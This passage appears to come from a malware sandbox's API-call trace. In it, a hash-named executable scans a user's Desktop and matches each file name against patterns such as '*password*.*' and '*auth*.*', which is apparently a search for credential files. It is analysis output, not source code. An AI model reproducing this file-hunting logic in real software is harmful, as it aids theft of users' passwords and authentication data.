lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" [0110.974] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=13, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 13 [0110.974] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=13, lpWideCharStr=0x3970560, cchWideChar=13 | out: lpWideCharStr="*password*.*") returned 13 [0110.974] PathMatchSpecW (pszFile="UQk58h 9TQk7yvi7D.mkv", pszSpec="*password*.*") returned 0 [0110.974] FindNextFileW (in: hFindFile=0x7436e0, lpFindFileData=0x19cbe0 | out: lpFindFileData=0x19cbe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd8827190, ftCreationTime.dwHighDateTime=0x1d7aa97, ftLastAccessTime.dwLowDateTime=0x8be18a00, ftLastAccessTime.dwHighDateTime=0x1d7ac64, ftLastWriteTime.dwLowDateTime=0x8be18a00, ftLastWriteTime.dwHighDateTime=0x1d7ac64, nFileSizeHigh=0x0, nFileSizeLow=0xefc6, dwReserved0=0x0, dwReserved1=0x0, cFileName="VAHC8zDa9SevTeoKicIh.docx", cAlternateFileName="VAHC8Z~1.DOC")) returned 1 [0110.974] lstrcpyW (in: lpString1=0x19ce30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" [0110.974] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=13, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 13 [0110.974] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=13, lpWideCharStr=0x3970678, cchWideChar=13 | out: lpWideCharStr="*password*.*") returned 13 [0110.974] PathMatchSpecW (pszFile="VAHC8zDa9SevTeoKicIh.docx", pszSpec="*password*.*") returned 0 [0110.974] FindNextFileW (in: hFindFile=0x7436e0, lpFindFileData=0x19cbe0 | out: lpFindFileData=0x19cbe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfeb7dc60, ftCreationTime.dwHighDateTime=0x1d7aa10, ftLastAccessTime.dwLowDateTime=0xa18851b0, ftLastAccessTime.dwHighDateTime=0x1d7ac6c, ftLastWriteTime.dwLowDateTime=0xa18851b0, ftLastWriteTime.dwHighDateTime=0x1d7ac6c, nFileSizeHigh=0x0, nFileSizeLow=0x10367, dwReserved0=0x0, dwReserved1=0x0, cFileName="VbI-8gh.mkv", cAlternateFileName="")) returned 1 [0110.974] lstrcpyW (in: lpString1=0x19ce30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" [0110.974] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=13, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 13 [0110.974] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=13, lpWideCharStr=0x39706c8, cchWideChar=13 | out: lpWideCharStr="*password*.*") returned 13 [0110.974] PathMatchSpecW (pszFile="VbI-8gh.mkv", pszSpec="*password*.*") returned 0 [0110.974] FindNextFileW (in: hFindFile=0x7436e0, lpFindFileData=0x19cbe0 | out: lpFindFileData=0x19cbe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x51556710, ftCreationTime.dwHighDateTime=0x1d7a815, ftLastAccessTime.dwLowDateTime=0xb84e1ac0, ftLastAccessTime.dwHighDateTime=0x1d7a9ff, ftLastWriteTime.dwLowDateTime=0xb84e1ac0, ftLastWriteTime.dwHighDateTime=0x1d7a9ff, nFileSizeHigh=0x0, nFileSizeLow=0x888f, dwReserved0=0x0, dwReserved1=0x0, cFileName="wwAL7t.mp4", cAlternateFileName="")) returned 1 [0110.974] lstrcpyW (in: lpString1=0x19ce30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" [0110.974] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=13, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 13 [0110.974] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=13, lpWideCharStr=0x39704c0, cchWideChar=13 | out: lpWideCharStr="*password*.*") returned 13 [0110.975] PathMatchSpecW (pszFile="wwAL7t.mp4", pszSpec="*password*.*") returned 0 [0110.975] FindNextFileW (in: hFindFile=0x7436e0, lpFindFileData=0x19cbe0 | out: lpFindFileData=0x19cbe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa619a40, ftCreationTime.dwHighDateTime=0x1d7a2e8, ftLastAccessTime.dwLowDateTime=0x562811b0, ftLastAccessTime.dwHighDateTime=0x1d7af50, ftLastWriteTime.dwLowDateTime=0x562811b0, ftLastWriteTime.dwHighDateTime=0x1d7af50, nFileSizeHigh=0x0, nFileSizeLow=0x1057b, dwReserved0=0x0, dwReserved1=0x0, cFileName="XDMAiqRYF.jpg", cAlternateFileName="XDMAIQ~1.JPG")) returned 1 [0110.975] lstrcpyW (in: lpString1=0x19ce30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" [0110.975] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=13, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 13 [0110.975] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=13, lpWideCharStr=0x39704e8, cchWideChar=13 | out: lpWideCharStr="*password*.*") returned 13 [0110.975] PathMatchSpecW (pszFile="XDMAiqRYF.jpg", pszSpec="*password*.*") returned 0 [0110.975] FindNextFileW (in: hFindFile=0x7436e0, lpFindFileData=0x19cbe0 | out: lpFindFileData=0x19cbe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x99eb9cb0, ftCreationTime.dwHighDateTime=0x1d7aca7, ftLastAccessTime.dwLowDateTime=0x28bfee50, ftLastAccessTime.dwHighDateTime=0x1d7ae51, ftLastWriteTime.dwLowDateTime=0x28bfee50, ftLastWriteTime.dwHighDateTime=0x1d7ae51, nFileSizeHigh=0x0, nFileSizeLow=0x1505d, dwReserved0=0x0, dwReserved1=0x0, cFileName="xmxJletH7GW6y.bmp", cAlternateFileName="XMXJLE~1.BMP")) returned 1 [0110.975] lstrcpyW (in: lpString1=0x19ce30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" [0110.975] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=13, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 13 [0110.975] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=13, lpWideCharStr=0x3970600, cchWideChar=13 | out: lpWideCharStr="*password*.*") returned 13 [0110.975] PathMatchSpecW (pszFile="xmxJletH7GW6y.bmp", pszSpec="*password*.*") returned 0 [0110.975] FindNextFileW (in: hFindFile=0x7436e0, lpFindFileData=0x19cbe0 | out: lpFindFileData=0x19cbe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf995fa10, ftCreationTime.dwHighDateTime=0x1d7a3b6, ftLastAccessTime.dwLowDateTime=0x6882a8f0, ftLastAccessTime.dwHighDateTime=0x1d7aec6, ftLastWriteTime.dwLowDateTime=0x6882a8f0, ftLastWriteTime.dwHighDateTime=0x1d7aec6, nFileSizeHigh=0x0, nFileSizeLow=0x94d9, dwReserved0=0x0, dwReserved1=0x0, cFileName="yBTl 8ysJ.mp3", cAlternateFileName="YBTL8Y~1.MP3")) returned 1 [0110.975] lstrcpyW (in: lpString1=0x19ce30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" [0110.975] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=13, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 13 [0110.975] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=13, lpWideCharStr=0x39703d0, cchWideChar=13 | out: lpWideCharStr="*password*.*") returned 13 [0110.975] PathMatchSpecW (pszFile="yBTl 8ysJ.mp3", pszSpec="*password*.*") returned 0 [0110.975] FindNextFileW (in: hFindFile=0x7436e0, lpFindFileData=0x19cbe0 | out: lpFindFileData=0x19cbe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2e10ef30, ftCreationTime.dwHighDateTime=0x1d7a5be, ftLastAccessTime.dwLowDateTime=0xe222b410, ftLastAccessTime.dwHighDateTime=0x1d7a972, ftLastWriteTime.dwLowDateTime=0xe222b410, ftLastWriteTime.dwHighDateTime=0x1d7a972, nFileSizeHigh=0x0, nFileSizeLow=0x1616d, dwReserved0=0x0, dwReserved1=0x0, cFileName="ZyW0U6HGvR1sY4.mkv", cAlternateFileName="ZYW0U6~1.MKV")) returned 1 [0110.975] lstrcpyW (in: lpString1=0x19ce30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" [0110.975] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=13, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 13 [0110.975] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=13, lpWideCharStr=0x39704e8, cchWideChar=13 | out: lpWideCharStr="*password*.*") returned 13 [0110.975] PathMatchSpecW (pszFile="ZyW0U6HGvR1sY4.mkv", pszSpec="*password*.*") returned 0 [0110.975] FindNextFileW (in: hFindFile=0x7436e0, lpFindFileData=0x19cbe0 | out: lpFindFileData=0x19cbe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbadff6a0, ftCreationTime.dwHighDateTime=0x1d7ab67, ftLastAccessTime.dwLowDateTime=0x51082c40, ftLastAccessTime.dwHighDateTime=0x1d7ad09, ftLastWriteTime.dwLowDateTime=0x51082c40, ftLastWriteTime.dwHighDateTime=0x1d7ad09, nFileSizeHigh=0x0, nFileSizeLow=0xe3d8, dwReserved0=0x0, dwReserved1=0x0, cFileName="_aNuOe6kDQsgIz0qDq.ods", cAlternateFileName="_ANUOE~1.ODS")) returned 1 [0110.975] lstrcpyW (in: lpString1=0x19ce30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" [0110.975] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=13, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 13 [0110.976] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=13, lpWideCharStr=0x3970560, cchWideChar=13 | out: lpWideCharStr="*password*.*") returned 13 [0110.976] PathMatchSpecW (pszFile="_aNuOe6kDQsgIz0qDq.ods", pszSpec="*password*.*") returned 0 [0110.976] FindNextFileW (in: hFindFile=0x7436e0, lpFindFileData=0x19cbe0 | out: lpFindFileData=0x19cbe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbadff6a0, ftCreationTime.dwHighDateTime=0x1d7ab67, ftLastAccessTime.dwLowDateTime=0x51082c40, ftLastAccessTime.dwHighDateTime=0x1d7ad09, ftLastWriteTime.dwLowDateTime=0x51082c40, ftLastWriteTime.dwHighDateTime=0x1d7ad09, nFileSizeHigh=0x0, nFileSizeLow=0xe3d8, dwReserved0=0x0, dwReserved1=0x0, cFileName="_aNuOe6kDQsgIz0qDq.ods", cAlternateFileName="_ANUOE~1.ODS")) returned 0 [0110.976] FindClose (in: hFindFile=0x7436e0 | out: hFindFile=0x7436e0) returned 1 [0110.976] SetLastError (dwErrCode=0x12) [0110.976] GetDriveTypeA (lpRootPathName="C:\\") returned 0x3 [0110.976] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3970510, cbMultiByte=31, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 31 [0110.976] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3970510, cbMultiByte=31, lpWideCharStr=0x29a2780, cchWideChar=31 | out: lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\") returned 31 [0110.976] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\*.*", lpFindFileData=0x19cbe0 | out: lpFindFileData=0x19cbe0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ced6473, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0xdbf44eb, ftLastAccessTime.dwHighDateTime=0x1d7b3bd, ftLastWriteTime.dwLowDateTime=0xdbf44eb, ftLastWriteTime.dwHighDateTime=0x1d7b3bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x743420 [0110.976] lstrcpyW (in: lpString1=0x19ce30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" [0110.976] FindNextFileW (in: hFindFile=0x743420, lpFindFileData=0x19cbe0 | out: lpFindFileData=0x19cbe0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ced6473, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0xdbf44eb, ftLastAccessTime.dwHighDateTime=0x1d7b3bd, ftLastWriteTime.dwLowDateTime=0xdbf44eb, ftLastWriteTime.dwHighDateTime=0x1d7b3bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0110.976] lstrcpyW (in: lpString1=0x19ce30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" [0110.976] FindNextFileW (in: hFindFile=0x743420, lpFindFileData=0x19cbe0 | out: lpFindFileData=0x19cbe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf546ee50, ftCreationTime.dwHighDateTime=0x1d7a7b3, ftLastAccessTime.dwLowDateTime=0x13efdd40, ftLastAccessTime.dwHighDateTime=0x1d7aa88, ftLastWriteTime.dwLowDateTime=0x13efdd40, ftLastWriteTime.dwHighDateTime=0x1d7aa88, nFileSizeHigh=0x0, nFileSizeLow=0x1883f, dwReserved0=0x0, dwReserved1=0x0, cFileName="0zAI6IIW3Y-.jpg", cAlternateFileName="0ZAI6I~1.JPG")) returned 1 [0110.976] lstrcpyW (in: lpString1=0x19ce30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" [0110.976] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=9, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 9 [0110.976] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=9, lpWideCharStr=0x3970ea0, cchWideChar=9 | out: lpWideCharStr="*auth*.*") returned 9 [0110.976] PathMatchSpecW (pszFile="0zAI6IIW3Y-.jpg", pszSpec="*auth*.*") returned 0 [0110.977] FindNextFileW (in: hFindFile=0x743420, lpFindFileData=0x19cbe0 | out: lpFindFileData=0x19cbe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf25bae10, ftCreationTime.dwHighDateTime=0x1d7a2f9, ftLastAccessTime.dwLowDateTime=0xa41e8ef0, ftLastAccessTime.dwHighDateTime=0x1d7a774, ftLastWriteTime.dwLowDateTime=0xa41e8ef0, ftLastWriteTime.dwHighDateTime=0x1d7a774, nFileSizeHigh=0x0, nFileSizeLow=0x2f95, dwReserved0=0x0, dwReserved1=0x0, cFileName="31NPwfpy_GlRh15.m4a", cAlternateFileName="31NPWF~1.M4A")) returned 1 [0110.977] lstrcpyW (in: lpString1=0x19ce30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" [0110.977] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=9, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 9 [0110.977] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=9, lpWideCharStr=0x3970d20, cchWideChar=9 | out: lpWideCharStr="*auth*.*") returned 9 [0110.977] PathMatchSpecW (pszFile="31NPwfpy_GlRh15.m4a", pszSpec="*auth*.*") returned 0 [0110.977] FindNextFileW (in: hFindFile=0x743420, lpFindFileData=0x19cbe0 | out: lpFindFileData=0x19cbe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7b968de0, ftCreationTime.dwHighDateTime=0x1d7ad67, ftLastAccessTime.dwLowDateTime=0x691a0d20, ftLastAccessTime.dwHighDateTime=0x1d7aea9, ftLastWriteTime.dwLowDateTime=0x691a0d20, ftLastWriteTime.dwHighDateTime=0x1d7aea9, nFileSizeHigh=0x0, nFileSizeLow=0x139fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="38ZOxe4ZNObW5Sq.pdf", cAlternateFileName="38ZOXE~1.PDF")) returned 1 [0110.977] lstrcpyW (in: lpString1=0x19ce30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" [0110.977] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=9, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 9 [0110.977] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=9, lpWideCharStr=0x3970ca0, cchWideChar=9 | out: lpWideCharStr="*auth*.*") returned 9 [0110.977] PathMatchSpecW (pszFile="38ZOxe4ZNObW5Sq.pdf", pszSpec="*auth*.*") returned 0 [0110.977] FindNextFileW (in: hFindFile=0x743420, lpFindFileData=0x19cbe0 | out: lpFindFileData=0x19cbe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28cd69a0, ftCreationTime.dwHighDateTime=0x1d7a3ce, ftLastAccessTime.dwLowDateTime=0xe9831490, ftLastAccessTime.dwHighDateTime=0x1d7aee3, ftLastWriteTime.dwLowDateTime=0xe9831490, ftLastWriteTime.dwHighDateTime=0x1d7aee3, nFileSizeHigh=0x0, nFileSizeLow=0x895d, dwReserved0=0x0, dwReserved1=0x0, cFileName="7eG9d7.mp4", cAlternateFileName="")) returned 1 [0110.977] lstrcpyW (in: lpString1=0x19ce30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" [0110.977] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=9, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 9 [0110.977] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=9, lpWideCharStr=0x3970d20, cchWideChar=9 | out: lpWideCharStr="*auth*.*") returned 9 [0110.977] PathMatchSpecW (pszFile="7eG9d7.mp4", pszSpec="*auth*.*") returned 0 [0110.977] FindNextFileW (in: hFindFile=0x743420, lpFindFileData=0x19cbe0 | out: lpFindFileData=0x19cbe0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x435fd682, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x435fd682, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x435fd682, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0110.977] lstrcpyW (in: lpString1=0x19ce30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" [0110.977] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=9, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 9 [0110.977] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=9, lpWideCharStr=0x3970e00, cchWideChar=9 | out: lpWideCharStr="*auth*.*") returned 9 [0110.977] PathMatchSpecW (pszFile="desktop.ini", pszSpec="*auth*.*") returned 0 [0110.977] FindNextFileW (in: hFindFile=0x743420, lpFindFileData=0x19cbe0 | out: lpFindFileData=0x19cbe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xefda3e80, ftCreationTime.dwHighDateTime=0x1d7b3bc, ftLastAccessTime.dwLowDateTime=0xefda3e80, ftLastAccessTime.dwHighDateTime=0x1d7b3bc, ftLastWriteTime.dwLowDateTime=0x29567e00, ftLastWriteTime.dwHighDateTime=0x1d7b3ac, nFileSizeHigh=0x0, nFileSizeLow=0x192800, dwReserved0=0x0, dwReserved1=0x0, cFileName="f811cfc4610369aee904c7c14d67b944f7b6f6fe0e26d7220385295c726272cd.exe", cAlternateFileName="F811CF~1.EXE")) returned 1 [0110.977] lstrcpyW (in: lpString1=0x19ce30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" [0110.977] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=9, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 9 [0110.978] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=9, lpWideCharStr=0x3970c60, cchWideChar=9 | out: lpWideCharStr="*auth*.*") returned 9 [0110.978] PathMatchSpecW (pszFile="f811cfc4610369aee904c7c14d67b944f7b6f6fe0e26d7220385295c726272cd.exe", pszSpec="*auth*.*") returned 0 [0110.978] FindNextFileW (in: hFindFile=0x743420, lpFindFileData=0x19cbe0 | out: lpFindFileData=0x19cbe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5c000a40, ftCreationTime.dwHighDateTime=0x1d7a7d8, ftLastAccessTime.dwLowDateTime=0x841601c0, ftLastAccessTime.dwHighDateTime=0x1d7aabb, ftLastWriteTime.dwLowDateTime=0x841601c0, ftLastWriteTime.dwHighDateTime=0x1d7aabb, nFileSizeHigh=0x0, nFileSizeLow=0x1414, dwReserved0=0x0, dwReserved1=0x0, cFileName="fmnAnasf2I.mp4", cAlternateFileName="FMNANA~1.MP4")) returned 1 [0110.978] lstrcpyW (in: lpString1=0x19ce30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" [0110.978] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=9, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 9 [0110.978] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=9, lpWideCharStr=0x3970c20, cchWideChar=9 | out: lpWideCharStr="*auth*.*") returned 9 [0110.978] PathMatchSpecW (pszFile="fmnAnasf2I.mp4", pszSpec="*auth*.*") returned 0 [0110.978] FindNextFileW (in: hFindFile=0x743420, lpFindFileData=0x19cbe0 | out: lpFindFileData=0x19cbe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfb8f0a80, ftCreationTime.dwHighDateTime=0x1d7adf4, ftLastAccessTime.dwLowDateTime=0xc336cc10, ftLastAccessTime.dwHighDateTime=0x1d7ae1a, ftLastWriteTime.dwLowDateTime=0xc336cc10, ftLastWriteTime.dwHighDateTime=0x1d7ae1a, nFileSizeHigh=0x0, nFileSizeLow=0x187f4, dwReserved0=0x0, dwReserved1=0x0, cFileName="g3fX8Y8-txe9_Es.m4a", cAlternateFileName="G3FX8Y~1.M4A")) returned 1 [0110.978] lstrcpyW (in: lpString1=0x19ce30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" [0110.978] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=9, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 9 [0110.978] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=9, lpWideCharStr=0x3970b60, cchWideChar=9 | out: lpWideCharStr="*auth*.*") returned 9 [0110.978] PathMatchSpecW (pszFile="g3fX8Y8-txe9_Es.m4a", pszSpec="*auth*.*") returned 0 [0110.978] FindNextFileW (in: hFindFile=0x743420, lpFindFileData=0x19cbe0 | out: lpFindFileData=0x19cbe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa2f3aea0, ftCreationTime.dwHighDateTime=0x1d7acc6, ftLastAccessTime.dwLowDateTime=0xe973a3a0, ftLastAccessTime.dwHighDateTime=0x1d7ad14, ftLastWriteTime.dwLowDateTime=0xe973a3a0, ftLastWriteTime.dwHighDateTime=0x1d7ad14, nFileSizeHigh=0x0, nFileSizeLow=0x15d9d, dwReserved0=0x0, dwReserved1=0x0, cFileName="Izq83dPIx.mp4", cAlternateFileName="IZQ83D~1.MP4")) returned 1 [0110.978] lstrcpyW (in: lpString1=0x19ce30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" [0110.978] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=9, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 9 [0110.978] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=9, lpWideCharStr=0x3970bc0, cchWideChar=9 | out: lpWideCharStr="*auth*.*") returned 9 [0110.978] PathMatchSpecW (pszFile="Izq83dPIx.mp4", pszSpec="*auth*.*") returned 0 [0110.978] FindNextFileW (in: hFindFile=0x743420, lpFindFileData=0x19cbe0 | out: lpFindFileData=0x19cbe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa6dde030, ftCreationTime.dwHighDateTime=0x1d7a99c, ftLastAccessTime.dwLowDateTime=0x51405ab0, ftLastAccessTime.dwHighDateTime=0x1d7aeb3, ftLastWriteTime.dwLowDateTime=0x51405ab0, ftLastWriteTime.dwHighDateTime=0x1d7aeb3, nFileSizeHigh=0x0, nFileSizeLow=0x12d9f, dwReserved0=0x0, dwReserved1=0x0, cFileName="k8k6qCAjWYmc.odt", cAlternateFileName="K8K6QC~1.ODT")) returned 1 [0110.978] lstrcpyW (in: lpString1=0x19ce30, 